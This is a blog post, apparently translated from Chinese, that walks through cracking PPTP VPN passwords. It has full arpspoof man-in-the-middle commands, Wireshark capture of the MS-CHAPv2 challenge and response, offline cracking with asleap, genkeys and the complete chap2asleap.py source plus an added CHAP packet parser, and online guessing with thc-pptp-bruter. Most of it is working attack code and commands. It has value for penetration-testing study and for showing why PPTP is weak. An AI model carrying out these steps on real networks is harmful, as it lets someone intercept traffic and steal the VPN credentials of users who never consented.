PPTP (Point-to-Point Tunneling Protocol) is a tunneling protocol built on top of PPP. It carries PPP frames over GRE, supports multi-protocol VPNs, and relies on PPP authentication methods such as PAP, CHAP/MS-CHAP and EAP for access control. It lets remote users reach a corporate network by dialling into an ISP or by connecting directly across the Internet or another network. In practice the authentication exchange is almost always MS-CHAPv2, and that exchange is what the rest of this post attacks.
The tools used are the 'asleap + genkeys' pair. Judging by their parameters the two look very simple, but using them for real can be thoroughly frustrating:
The procedure is: first capture a **.pcap containing the username and the CHAP challenge/response (the password itself never crosses the wire; only the challenge and the response derived from the password hash do), then use genkeys to build the hashed dictionary asleap expects, then run asleap against the captured file and you are done!
genkeys -r wordlist.lst -f wordlist.dat -n wordlist.idx
asleap -r **.pcap -f wordlist.dat -n wordlist.idx
But in practice, every time I tried it asleap kept throwing errors:
In the end I found that an expert abroad had written a script for this, 'chap2asleap.py', ported it over and worked through it following the original article (original: http://blog.g0tmi1k.com/2010/03/chap2asleappy-v011-vpn/)!
First, ARP-spoof the target host from our machine (enable IP forwarding on the attacking machine before this, otherwise the redirected traffic is dropped and the target simply loses connectivity; x.x.x.x and y.y.y.y are the two endpoints to sit between, typically the target host and its gateway, and the second command poisons the reverse direction):
arpspoof -i interface -t x.x.x.x y.y.y.y
arpspoof -i interface -t y.y.y.y x.x.x.x
Next, start capturing with Wireshark (PS: I noticed that articles from "a long time ago" all use anger and pptp-sniff to capture PPTP; I searched for ages recently and could not find either of them, no idea why):
wireshark -i interface -k
Have the target host log in to the VPN so Wireshark captures the exchange. Filter on 'chap' and the username is already visible in clear text (it is the Name field of the CHAP Response). Then copy the Value field of the Challenge and of the Response separately. For MS-CHAPv2 the Challenge value is 16 bytes (32 hex characters) and the Response value is 49 bytes (98 hex characters): a 16-byte peer challenge, 8 reserved zero bytes, the 24-byte NT-Response and a flags byte. The script checks exactly these lengths, so if Wireshark shows something else you are not looking at an MS-CHAPv2 exchange.
Crack the password with 'chap2asleap.py' (the script's short options are lower-case -c and -r; -u supplies the username, which the script otherwise prompts for, and the username is part of the challenge hash so it must be exactly the one seen in the capture):
python chap2asleap.py -u username -c Challenge_value -r Response_value -x -v -d /path/to/wordlist.lst -p /path/to/asleap
-d  custom dictionary file; the script's default is /pentest/passwords/wordlists/darkc0de.lst
-p  directory containing asleap and genkeys; the script's default is /pentest/wireless/asleap, so point this at wherever asleap is actually installed (e.g. /usr/bin)
As the figure below shows, cracking a test password of my own errored out, while cracking the one from the video succeeded; my guess is that the encryption protocol under Windows has been strengthened.
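The capture step above copies the CHAP Challenge and Response values out of Wireshark by hand, and chap2asleap.py then turns them into asleap arguments. The following is an added example written for this edit, not code from the original post or from g0tmi1k's script: it performs the same conversion starting from raw PPP CHAP packet bytes. It parses the RFC 1994 CHAP header (Code, Identifier, Length, Value-Size, Value, Name), splits the 49-byte MS-CHAPv2 Response into its fields and rejects non-zero reserved or flags bytes, checks that the Response actually answers the Challenge (matching Identifier), strips any DOMAIN\ prefix from the user name because RFC 2759 hashes only the user part, and derives the 8-byte ChallengeHash that asleap takes as -C. The sample packets are constructed here from the challenge/response values in the script's help text; the identifier 7, the server name pptp-server and the CORP\ domain prefix are assumptions made for the sample.

```python
import hashlib
import struct

# PPP CHAP packet codes (RFC 1994)
CHAP_CHALLENGE = 1
CHAP_RESPONSE = 2


def parse_chap(packet: bytes) -> dict:
    """Parse a PPP CHAP packet: Code(1) Identifier(1) Length(2) Value-Size(1) Value Name."""
    if len(packet) < 5:
        raise ValueError("CHAP packet too short")
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if length < 5 or length > len(packet):
        raise ValueError("bad CHAP Length field")
    value_size = packet[4]
    if 5 + value_size > length:
        raise ValueError("Value-Size exceeds packet length")
    value = packet[5:5 + value_size]
    name = packet[5 + value_size:length].decode("utf-8", "replace")
    return {"code": code, "id": ident, "value": value, "name": name}


def split_mschapv2_response(value: bytes) -> tuple:
    """MS-CHAPv2 Response value (RFC 2759): 16 peer challenge, 8 reserved, 24 NT-Response, 1 flags."""
    if len(value) != 49:
        raise ValueError("MS-CHAPv2 response must be 49 bytes, got %d" % len(value))
    peer, reserved, nt_response, flags = value[:16], value[16:24], value[24:48], value[48]
    if reserved != bytes(8):
        raise ValueError("reserved bytes must be zero")
    if flags != 0:
        raise ValueError("flags byte must be zero")
    return peer, nt_response


def challenge_hash(peer: bytes, auth: bytes, username: str) -> bytes:
    """RFC 2759 ChallengeHash: first 8 bytes of SHA1(PeerChallenge | AuthenticatorChallenge | UserName)."""
    return hashlib.sha1(peer + auth + username.encode("utf-8")).digest()[:8]


def colon_hex(data: bytes) -> str:
    return ":".join("%02x" % b for b in data)


def asleap_args(challenge_pkt: bytes, response_pkt: bytes) -> dict:
    """Turn a captured CHAP Challenge/Response pair into the -C and -R values asleap expects."""
    chal = parse_chap(challenge_pkt)
    resp = parse_chap(response_pkt)
    if chal["code"] != CHAP_CHALLENGE or resp["code"] != CHAP_RESPONSE:
        raise ValueError("need one CHAP Challenge and one CHAP Response packet")
    if chal["id"] != resp["id"]:
        raise ValueError("Identifier mismatch: this Response does not answer this Challenge")
    if len(chal["value"]) != 16:
        raise ValueError("MS-CHAPv2 authenticator challenge must be 16 bytes")
    peer, nt_response = split_mschapv2_response(resp["value"])
    # Only the user part is hashed; a leading "DOMAIN\" must be dropped (RFC 2759, section 8.2).
    user = resp["name"].split("\\")[-1]
    return {
        "user": user,
        "challenge": colon_hex(challenge_hash(peer, chal["value"], user)),
        "response": colon_hex(nt_response),
    }


def asleap_command(args: dict, wordlist: str) -> str:
    return "asleap -C %s -R %s -W %s" % (args["challenge"], args["response"], wordlist)


def build_chap(code: int, ident: int, value: bytes, name: str) -> bytes:
    """Assemble a CHAP packet (used only to construct the sample below)."""
    body = bytes([len(value)]) + value + name.encode("utf-8")
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


# Constructed sample: hex values from the chap2asleap help text, packet framing assumed here.
AUTH_CHALLENGE = bytes.fromhex("e3a5d0775370bda51e16219a06b0278f")
PEER_CHALLENGE = bytes.fromhex("84c4b33e00d9231645598acf91c38480")
NT_RESPONSE = bytes.fromhex("565fe2492fd5fb88edaec934c00d282c046227406c31609b")
SAMPLE_CHALLENGE_PKT = build_chap(CHAP_CHALLENGE, 7, AUTH_CHALLENGE, "pptp-server")
SAMPLE_RESPONSE_PKT = build_chap(CHAP_RESPONSE, 7,
                                 PEER_CHALLENGE + bytes(8) + NT_RESPONSE + b"\x00",
                                 "CORP\\scott")

if __name__ == "__main__":
    result = asleap_args(SAMPLE_CHALLENGE_PKT, SAMPLE_RESPONSE_PKT)
    print("user:", result["user"])
    print(asleap_command(result, "wordlist.lst"))
```

The two checks that matter in practice are the Identifier match and the zero reserved/flags bytes: a capture with several logins in it contains several Challenge/Response pairs, and feeding asleap a challenge from one exchange with the response from another can never crack. The Name field is taken from the Response, not the Challenge, since in CHAP the Challenge carries the server's name and the Response carries the user's.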
Following on from the above: once Wireshark has revealed the username and the VPN server address of the target's connection, the password can also be guessed online against the server with thc-pptp-bruter (noisier than the offline attack, and every attempt shows up in the server's logs):
thc-pptp-bruter -u username vpn服務器ip < 字典文件
cat 字典文件 | thc-pptp-bruter -u username vpn服務器ip
Optional parameters: -n, -l
chap2asleap.py script source (cleaned up and ported to Python 3):
#!/usr/bin/env python3
#----------------------------------------------------------------------------------------------#
# chap2asleap.py v0.2 (#3 2011-04-05)                                                          #
# (C)opyright 2011 - g0tmi1k                                                                   #
#---Important----------------------------------------------------------------------------------#
#                     *** Do NOT use this for illegal or malicious use ***                     #
#                By running this, YOU are using this program at YOUR OWN RISK.                 #
#            This software is provided "as is", WITHOUT ANY guarantees OR warranty.            #
#---Modules------------------------------------------------------------------------------------#
import os, re, sys, hashlib, getopt, binascii, subprocess
from urllib.request import urlopen
#---Defaults-----------------------------------------------------------------------------------#
# [/path/to/the/file] Use which file
wordlistPath = "/pentest/passwords/wordlists/darkc0de.lst"
# [/path/to/the/folder] Where is asleap?
asleapPath = "/pentest/wireless/asleap"
# [True/False] Shows more info
verbose = False
# [True/False] Runs asleap afterwards
run = False
# [True/False] Use the wordlist for the attack
wordlist = False
#---Variables----------------------------------------------------------------------------------#
version = "0.2 #3"
txtUser = ""  # null the value
txtChal = ""  # null the value
txtResp = ""  # null the value
action = "\033[32m[>]\033[0m "
info   = "\033[33m[i]\033[0m "
diag   = "\033[34m[+]\033[0m "
error  = "\033[31m[!]\033[0m "
#----Functions---------------------------------------------------------------------------------#
def SplitList(list, chunk_size):
    # "0123abcd" -> "01:23:ab:cd:"  (the caller trims the trailing colon)
    return "".join([list[offs:offs+chunk_size] + ":" for offs in range(0, len(list), chunk_size)])
#----------------------------------------------------------------------------------------------#
def help_message():
    print("""(C)opyright 2011 g0tmi1k ~ http://g0tmi1k.blogspot.com
Usage: python chap2asleap.py [options]
Options:
  -u username...            -- Username
  -c 0123456789ABCDEF...    -- PPP CHAP Challenge (32 characters)
  -r 0123456789ABCDEF...    -- PPP CHAP Response  (98 characters)
  -x                        -- Runs asleap afterwards
  -w                        -- Uses "Wordlist" for the attack, instead of "genkey" (Default is genkey)
  -p /path/to/asleap        -- Example: """ + asleapPath + """
  -d /path/to/wordlist.lst  -- Example: """ + wordlistPath + """
  -h                        -- Displays this help message
  -v                        -- Verbosity mode (shows more detail)
  --update                  -- Downloads the latest version
Example:
  python chap2asleap.py -u scott -c e3a5d0775370bda51e16219a06b0278f -r 84c4b33e00d9231645598acf91c384800000000000000000565fe2492fd5fb88edaec934c00d282c046227406c31609b00 -x -v
Extra Help:
  Authors Page: http://www.willhackforsushi.com/Asleap.html
  Blog Post:    http://g0tmi1k.blogspot.com/2010/03/script-chap2asleappy.html
  Video:        http://g0tmi1k.blogspot.com/2010/03/video-cracking-vpn-asleap-thc-pptp.html""")
    sys.exit(0)
#----------------------------------------------------------------------------------------------#
def updateScript():
    try:
        rScript = urlopen("http://g0tmi1k.googlecode.com/svn/trunk/chap2asleap/chap2asleap.py").read().decode("utf-8", "replace")
    except Exception:
        print(error + "Error: Couldn't connect to server")
        print(error + "Update Failed")
        sys.exit(1)
    rVersion = re.findall(r'version = "\d.+\d.+\d.', rScript.lower())
    if rVersion:
        rVersion = rVersion[0].replace("version = ", "").replace("\"", "")
    else:
        print(error + "Couldn't detect version. Please manually update")
        print(error + "Update Failed")
        sys.exit(1)
    if version == rVersion:
        print(action + "Up-to-date")
    else:
        print(action + "Updating...")
        updateFile = open("chap2asleap.py", "w")
        updateFile.write(rScript)
        updateFile.close()
        print(action + "Update complete")
    sys.exit(1)
#---Main---------------------------------------------------------------------------------------#
print("\033[36m[*]\033[0m chap2asleap v" + version + " ~ Asleap Argument Generator")
#----------------------------------------------------------------------------------------------#
try:
    opts, args = getopt.getopt(sys.argv[1:], "u:c:r:vxwp:d:h?", ["user=", "challenge=", "response=", "path=", "wordlist=", "help", "update"])
except getopt.GetoptError as err:   # print help information and exit
    print(str(err))   # will print something like "option -a not recognized"
    sys.exit(0)
#if len(opts) == 0:
#    help_message()
for o, a in opts:
    if o in ("-u", "--user"):
        txtUser = a
    if o in ("-c", "--challenge"):
        txtChal = a
    if o in ("-r", "--response"):
        txtResp = a
    if o == "-v":
        verbose = True
    if o == "-x":
        run = True
    if o == "-w":
        wordlist = True
    if o in ("-p", "--path"):
        asleapPath = a
    if o in ("-d", "--wordlist"):
        wordlistPath = a
    if o in ("-h", "--help", "-?"):
        help_message()
    if o == "--update":
        updateScript()
#----------------------------------------------------------------------------------------------#
mainLoop = True
try:
    while mainLoop:
        if txtUser == "": txtUser = input("[~] Please enter the username: ")
        else: mainLoop = False
    mainLoop = True
    while mainLoop:
        if txtChal == "": txtChal = input("[~] Please enter the PPP CHAP Challenge: ")
        txtChal = txtChal.replace(":", "")   # accept Wireshark's "aa:bb:cc" form as well
        if not re.fullmatch("[0-9a-fA-F]*", txtChal):
            txtChal = ""
            print(error + "Sorry, you can't input that for the CHAP Challenge. Only 0-9 a-f.")
        elif len(txtChal) != 32:
            txtChal = ""
            print(error + "Sorry, PPP CHAP Challenge has to be 32 hex characters (16 bytes) in length.")
        else:
            mainLoop = False
    mainLoop = True
    while mainLoop:
        if txtResp == "": txtResp = input("[~] Please enter the PPP CHAP Response: ")
        txtResp = txtResp.replace(":", "")
        if not re.fullmatch("[0-9a-fA-F]*", txtResp):
            print(error + "Sorry, you can't input that for the CHAP Response. Only 0-9 a-f.")
            txtResp = ""
        elif len(txtResp) != 98:
            print(error + "Sorry, PPP CHAP Response has to be 98 hex characters (49 bytes) in length.")
            txtResp = ""
        else:
            mainLoop = False
    if asleapPath[-1:] == "/": asleapPath = asleapPath[0:-1]
    #------------------------------------------------------------------------------------------#
    if verbose == True: print(info + "      Username: " + txtUser)
    if verbose == True: print(info + "CHAP Challenge: " + txtChal)
    if verbose == True: print(info + " CHAP Response: " + txtResp)
    #------------------------------------------------------------------------------------------#
    # MS-CHAPv2 (RFC 2759): the 49-byte Response is 16-byte PeerChallenge | 8 reserved |
    # 24-byte NT-Response | 1 flags byte.  asleap wants the 8-byte ChallengeHash
    # (SHA1(PeerChallenge | AuthenticatorChallenge | UserName)[0:8]) as -C and the NT-Response as -R.
    authChallenge = binascii.unhexlify(txtChal)
    peerChallenge = binascii.unhexlify(txtResp[0:32])
    response = txtResp[48:96]
    challenge = hashlib.sha1(peerChallenge + authChallenge + txtUser.encode("utf-8")).hexdigest()[0:16]
    if verbose == True: print(info + "Auth Challenge: " + txtChal)
    if verbose == True: print(info + "Peer Challenge: " + txtResp[0:32])
    if verbose == True: print(info + " Peer Response: " + response)
    if verbose == True: print(info + "     Challenge: " + challenge)
    challenge = (SplitList(challenge, 2))[0:-1]   # colon-separated hex, as asleap expects
    response  = (SplitList(response, 2))[0:-1]
    #------------------------------------------------------------------------------------------#
    print(action + "Result:")
    print("cd " + asleapPath)
    if wordlist == False:
        print("./genkeys -r " + wordlistPath + " -f words.dat -n words.idx")
        print("./asleap -C " + challenge + " -R " + response + " -f words.dat -n words.idx")
    else:
        print("./asleap -C " + challenge + " -R " + response + " -W " + wordlistPath)
    #------------------------------------------------------------------------------------------#
    if os.path.isfile(asleapPath + "/genkeys") and run == True:
        # argument lists rather than a shell string, so paths with spaces or metacharacters are safe
        if wordlist == False:
            subprocess.call([asleapPath + "/genkeys", "-r", wordlistPath, "-f", "/tmp/words.dat", "-n", "/tmp/words.idx"])
            subprocess.call([asleapPath + "/asleap", "-C", challenge, "-R", response, "-f", "/tmp/words.dat", "-n", "/tmp/words.idx"])
            os.remove("/tmp/words.dat")
            os.remove("/tmp/words.idx")
        if wordlist == True:
            subprocess.call([asleapPath + "/asleap", "-C", challenge, "-R", response, "-W", wordlistPath])
    elif run == True:
        print(error + "asleap isn't located in: " + asleapPath)
    #------------------------------------------------------------------------------------------#
    print("\033[36m[*]\033[0m Done! =)")
    #------------------------------------------------------------------------------------------#
except KeyboardInterrupt:
    print("")
    sys.exit(0)
Source: FreeBuf (FreeBuf.com)